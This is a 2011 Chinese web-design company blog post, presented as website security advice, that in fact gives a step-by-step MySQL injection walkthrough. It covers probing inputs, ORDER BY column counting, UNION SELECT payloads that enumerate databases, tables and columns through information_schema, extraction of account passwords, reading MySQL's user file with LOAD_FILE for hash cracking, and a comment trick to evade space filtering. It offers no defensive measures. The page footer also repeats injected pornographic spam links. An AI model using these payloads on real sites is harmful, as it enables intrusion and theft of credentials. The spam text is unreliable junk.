網(wǎng)站制作安全之mysql注入技巧

來源：昆明多彩網(wǎng)絡公司日期：2011-09-19 閱讀：發(fā)表評論

mysql注入指得是通過程序的漏洞（比如沒有過濾），通過執(zhí)行sql語句進行入侵網(wǎng)站并最終得到服務器權限的行為

mysql注入大致流程：

1、得到注入點，在頁面參數(shù)后面加'或者and 1=1和and 1=2測試，如果程序報錯或者有一些異常情況（比如執(zhí)行結果不同）發(fā)生則表明該頁面有漏洞存在。

2、在參數(shù)后面加入 order by 10，10，如果沒有什么反應則將后面的10繼續(xù)增加，如果報錯就說明字段數(shù)少于該數(shù)。

3、暴數(shù)據(jù)庫名，假設當前被注入表的字段數(shù)有3個，通過下面兩種方式得到

3.1 union select database(),user(),version()

3.1 在后面加入 union select 1,SCHEMA_NAME,3 from information_schema.SCHEMATA limit 2,1，將得到數(shù)據(jù)庫名稱，第一個數(shù)據(jù)庫為information_schema

4、暴表名，and 1=2 union select 1,table_name,3 from (select * from information_schema.tables where table_schema=0x6861636B)t limit 0,1 0x6861636B為數(shù)據(jù)庫名稱轉成了16進制，用小葵花工具轉換得到，通過上一步可以得到，注意limit前面的t不能省略。

5、暴字段名 and 1=2 union select 1,2,column_name from (select * from information_schema.columns where table_name=0x61646D696E and table_schema=0x6861636B)t limit 0,1；0x61646D696E為表名，table_schema為字段名。

6、union select 1,"字段1","字段2" from "表名" limit 0,1，就可以得到帳戶和密碼了。

7、其他：得到root的密碼通過LOAD_FILE(’C:\..\MYSQL\DATA\MYSQL\USER.MYD’)得到用戶的HASH散列,之后用CAIN爆破…如果程序過濾了空格，可以使用/**/相當于空格作用

上一篇：網(wǎng)站建設之設計是種壟斷下一篇：網(wǎng)站制作中chrome(google瀏覽器)的若干技巧

發(fā)表評論評論列表（有條評論）

相關文章：: 表單輸入和網(wǎng)站安全的幾個要點? 閱讀:133; 網(wǎng)站的安全和防黑客攻擊要點閱讀:310

最熱文章：: 新手怎么制作網(wǎng)頁? 閱讀:7660; jcarousellite中文文檔閱讀:6507; 表單元素input、按鈕、文字完美垂閱讀:6247; 怎么使chrome(谷歌google 閱讀:6145; phpMailer中文文檔手冊閱讀:4639

欧美黄色一级免费,爽爽日本在线视频免费,在线免费观看黄色片,欧美在线视频一区在线观看,99久视频,欧美九九视频,99精品在线播放

云南網(wǎng)站建設創(chuàng)新企業(yè) 昆明多彩網(wǎng)絡公司

網(wǎng)站公告

網(wǎng)站建設理念

網(wǎng)站建設常見問題

網(wǎng)站制作安全之mysql注入技巧

發(fā)表評論評論列表（有條評論）

欧美黄色一级免费,爽爽日本在线视频免费,在线免费观看黄色片,欧美在线视频一区在线观看,99久视频,欧美九九视频,99精品在线播放

云南網(wǎng)站建設創(chuàng)新企業(yè) 昆明多彩網(wǎng)絡公司

網(wǎng)站公告

網(wǎng)站建設理念

網(wǎng)站建設常見問題

網(wǎng)站制作安全之mysql注入技巧

發(fā)表評論評論列表（有 條評論）

發(fā)表評論評論列表（有條評論）